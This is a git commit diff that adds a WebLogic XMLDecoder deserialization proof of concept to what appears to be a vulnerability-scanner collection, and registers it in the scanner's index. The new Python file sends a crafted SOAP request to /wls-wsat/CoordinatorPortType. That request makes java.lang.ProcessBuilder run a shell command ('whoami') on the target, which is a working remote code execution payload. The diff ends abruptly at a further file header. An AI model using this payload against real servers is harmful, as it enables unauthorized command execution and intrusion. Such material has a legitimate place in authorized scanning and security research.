add weblogic_xmldecoder_exec poc

2017-12-23 19:11:28 +08:00
parent cb5e2f0692
commit 5f14673f22
4 changed files with 63 additions and 0 deletions
--- a/pocdb.py
+++ b/pocdb.py
@@ -294,6 +294,7 @@ class pocdb_pocs:
            "TurboMail设计缺陷以及默认配置漏洞":turbomail_conf_BaseVerify(url),
            "TurboGate邮件网关XXE漏洞":turbogate_services_xxe_BaseVerify(url),
            "weblogic SSRF漏洞":weblogic_ssrf_BaseVerify(url),
+            "weblogic XMLdecoder反序列化漏洞":weblogic_xmldecoder_exec_BaseVerify(url),
            "weblogic 接口泄露":weblogic_interface_disclosure_BaseVerify(url),
            "实易DNS管理系统文件包含至远程代码执行":forease_fileinclude_code_exec_BaseVerify(url),
            "hudson源代码泄露漏洞":hudson_ws_disclosure_BaseVerify(url),
--- a/system/systemmain.py
+++ b/system/systemmain.py
@@ -27,6 +27,7 @@ from system.turbomail.turbogate_services_xxe import turbogate_services_xxe_BaseV

 #weblogic vulns
 from system.weblogic.weblogic_ssrf import weblogic_ssrf_BaseVerify
+from system.weblogic.weblogic_xmldecoder_exec import weblogic_xmldecoder_exec_BaseVerify
 from system.weblogic.weblogic_interface_disclosure import weblogic_interface_disclosure_BaseVerify

 #hudson vulns
--- a/system/weblogic/weblogic_xmldecoder_exec.py
+++ b/system/weblogic/weblogic_xmldecoder_exec.py
@@ -0,0 +1,61 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+'''
+name: weblogic XMLdecoder反序列化漏洞
+referer: https://www.anquanke.com/post/id/92003
+author: Lucifer
+description: weblogic /wls-wsat/CoordinatorPortType接口存在命令执行。
+'''
+import sys
+import requests
+import warnings
+from termcolor import cprint
+
+class weblogic_xmldecoder_exec_BaseVerify:
+    def __init__(self, url):
+        self.url = url
+
+    def run(self):
+        headers = {
+            "Content-Type":"text/xml;charset=UTF-8",
+            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
+        }
+        payload = "/wls-wsat/CoordinatorPortType"
+        post_data = '''
+        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> 
+          <soapenv:Header> 
+            <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">  
+              <java> 
+                <object class="java.lang.ProcessBuilder"> 
+                  <array class="java.lang.String" length="3"> 
+                    <void index="0"> 
+                      <string>/bin/sh</string> 
+                    </void>  
+                    <void index="1"> 
+                      <string>-c</string> 
+                    </void>  
+                    <void index="2"> 
+                      <string>whoami</string>
+                    </void> 
+                  </array>  
+                  <void method="start"/> 
+                </object> 
+              </java> 
+            </work:WorkContext> 
+          </soapenv:Header>  
+          <soapenv:Body/> 
+        </soapenv:Envelope>
+        '''
+        vulnurl = self.url + payload
+        try:
+            req = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
+            if req.status_code == 500 and r"ProcessBuilder" in req.text:
+                cprint("[+]存在weblogic XMLdecoder反序列化漏洞...(高危)\tpayload: "+vulnurl, "red")
+
+        except:
+            cprint("[-] "+__file__+"====>连接超时", "cyan")
+
+if __name__ == "__main__":
+    warnings.filterwarnings("ignore")
+    testVuln = weblogic_xmldecoder_exec_BaseVerify(sys.argv[1])
+    testVuln.run()
--- a/weaver/init.py
+++ b/weaver/init.py